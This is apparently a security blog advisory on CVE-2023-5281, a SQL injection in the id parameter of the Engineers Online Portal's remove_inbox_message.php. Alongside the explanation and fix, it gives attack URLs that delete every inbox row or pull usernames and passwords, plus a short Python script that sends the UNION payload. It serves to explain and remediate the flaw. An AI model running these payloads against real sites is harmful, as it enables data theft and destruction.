CVE-2023-5281 - Critical SQL Injection Vulnerability in SourceCodester Engineers Online Portal 1. (VDB-240909) – Full Details, Exploit, and How to Stay Safe

A recent security flaw, tracked as CVE-2023-5281 (VDB-240909), has been discovered in SourceCodester Engineers Online Portal version 1.. Attackers can exploit this vulnerability remotely to execute SQL injection attacks, potentially compromising sensitive data, taking over accounts, or disrupting the service.
The issue lies in the remove_inbox_message.php file, specifically how the id parameter is processed. The problem is critical—if you use this application, you must act immediately.

What Is SQL Injection and Why Is It Dangerous?

SQL Injection (SQLi) happens when user-controlled input is processed by a web server without proper sanitization and sent directly into a SQL database query. Malicious users can craft input to manipulate backend SQL queries, viewing, modifying, or deleting important database records.

For more information on SQL injection:
- OWASP SQL Injection

Details of CVE-2023-5281

- Vulnerable Product: SourceCodester Engineers Online Portal 1.

According to the VulDB entry VDB-240909:

> A vulnerability, classified as critical, was found in SourceCodester Engineers Online Portal 1.. ... The manipulation of the argument id ... leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public.

Let’s look at the likely vulnerable snippet from remove_inbox_message.php (a hypothetical reconstruction, not the project's actual source):

```php
// Vulnerable PHP code (hypothetical reconstruction)
$id = $_GET['id'];                           // untrusted input, no validation or sanitization
$sql = "DELETE FROM inbox WHERE id = $id";   // interpolated straight into the SQL text
mysqli_query($conn, $sql);                   // $conn: an existing mysqli connection
```

What went wrong?

- The id parameter is taken straight from user input ($_GET['id']) without validation or sanitization.

An attacker can simply visit the following URL:

```
http://victim.site/remove_inbox_message.php?id=1 OR 1=1
```

This would delete *every* message in the inbox because the query becomes:

```sql
DELETE FROM inbox WHERE id = 1 OR 1=1
```

Attackers can go further and leak database content, for example:

```
http://victim.site/remove_inbox_message.php?id= UNION SELECT 1, username, password FROM users--
```

If the web page echoes back any data or if error messages are enabled, attackers can extract sensitive info.

Here’s a simple example in Python using requests:

```python
import requests

# Target endpoint and the injected id value from the example above
target = "http://victim.site/remove_inbox_message.php"
payload = " UNION SELECT 1, username, password FROM users--"
url = f"{target}?id={payload}"

# Any echoed data or SQL error text ends up in the response body
response = requests.get(url)
print(response.text)
```

The fix is to hand `id` to the database as a bound parameter of a prepared statement instead of interpolating it into the query string (reconstructed from the fragment above, not the project's actual patch):

```php
// Secure version: prepared statement with the id bound as an integer
$id = (int) $_GET['id'];
$stmt = $conn->prepare("DELETE FROM inbox WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
```
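As an added example (not code from the portal, VulDB or this write-up), the bug and its fix reproduced against a constructed in-memory SQLite inbox, so the effect of the `1 OR 1=1` payload on the interpolated query and on the parameterised one can be checked side by side. Table and column names are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for the portal's inbox table (schema is an assumption).
def make_inbox() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE inbox (id INTEGER PRIMARY KEY, subject TEXT)")
    conn.executemany(
        "INSERT INTO inbox (id, subject) VALUES (?, ?)",
        [(1, "welcome"), (2, "meeting"), (3, "invoice")],
    )
    conn.commit()
    return conn


def remove_message_vulnerable(conn: sqlite3.Connection, raw_id: str) -> int:
    """Mirrors the hypothetical PHP: the id is pasted into the SQL text."""
    cur = conn.execute(f"DELETE FROM inbox WHERE id = {raw_id}")
    conn.commit()
    return cur.rowcount  # rows actually deleted


def is_valid_id(raw_id: str) -> bool:
    """Strict allow-list: an id is a run of ASCII digits and nothing else."""
    return re.fullmatch(r"[0-9]+", raw_id) is not None


def remove_message_fixed(conn: sqlite3.Connection, raw_id: str) -> int:
    """Hardened: validate the type, then bind the value as a parameter."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be a positive integer")
    cur = conn.execute("DELETE FROM inbox WHERE id = ?", (int(raw_id),))
    conn.commit()
    return cur.rowcount


def remaining(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT COUNT(*) FROM inbox").fetchone()[0]
```

The same payload wipes every row through the vulnerable function and is rejected before it reaches the database through the fixed one; even without the allow-list, the bound parameter would be compared as a single value rather than parsed as SQL.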

- Update immediately: If you use this application, check for patches or updates from the vendor (SourceCodester Projects).
- Restrict database permissions. Limit the privileges of your database users.

---

## References

- VulDB entry for VDB-240909
- Original SourceCodester Project
- Full Disclosure – Exploit Details

---

## Summary Table

| CVE ID | Product | File | Parameter | Impact |
|----------------|----------------------------|------------------------|-----------|------------------------------------------|
| CVE-2023-5281 | Engineers Online Portal 1. | remove_inbox_message.php | id | SQLi: Data theft, deletion, full access |

---

## Conclusion

CVE-2023-5281 is a critical vulnerability that threatens the security of SourceCodester Engineers Online Portal 1. users. With public exploit details available, attackers can easily compromise your site. Patch your systems, audit your code, and stay safe!

*For more breakdowns on real-world vulnerabilities, keep following up-to-date security resources and always keep your systems patched.*

Timeline

Published on: 09/29/2023 19:15:09 UTC
Last modified on: 11/07/2023 04:23:46 UTC